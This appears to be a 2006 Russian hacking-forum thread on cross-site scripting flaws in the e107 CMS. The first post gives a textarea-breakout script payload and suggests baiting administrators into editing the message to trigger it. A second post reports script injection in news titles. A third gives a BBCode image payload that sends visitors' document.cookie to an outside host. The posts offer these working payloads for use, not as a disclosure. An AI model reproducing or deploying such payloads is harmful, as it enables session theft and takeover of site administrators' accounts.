Форумы XSS в e107

Discussion in 'Уязвимости CMS/форумов' started by Ponchik, 11 Nov 2006.

  1. Ponchik

    Ponchik Хлебо-булочное изделие

    Joined:
    30 Aug 2005
    Messages:
    687
    Likes Received:
    807
    Reputations:
    311
    Хай! Вот выкладывал на одном форуме e107 HTML код, потом решил отредактировать, нажал, и увидел XSS :D При цитировании или редактировании сообщения, фильтрации нет :) Чё я имею в виду? Прём на e107 и пишем
    Code:
    </textarea><script>alert()</script>
    и при нажатии на "Редактировать" или "Цитировать" выдаётся алерт, тоесть можно написать сообщение, и матернуться в нём, и админ или модер обязательно нжмут на "Редактировать" :D
     
  2. dv0rnik

    dv0rnik New Member

    Joined:
    10 Nov 2006
    Messages:
    9
    Likes Received:
    1
    Reputations:
    0
    Так же есть уязвимость в добавить новость при вставке в тема или заголовок (точно не помню как правильно ) <scrip*t>alert(*)</scrip*t> выдаётся алерт тестировалось на локалхосте с последней версией счкачаной вчера
     
  3. CtHuLhU

    CtHuLhU New Member

    Joined:
    12 Nov 2006
    Messages:
    6
    Likes Received:
    1
    Reputations:
    0
    HTML по дефолту разрешен админу. Обычным пользователям - нет. Потому на локалеке и катит.

    вот ещё нашёл. правда же примитив? =)

    [im*g]javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;[/im*g]
     
    #3 CtHuLhU, 19 Nov 2006
    Last edited: 19 Nov 2006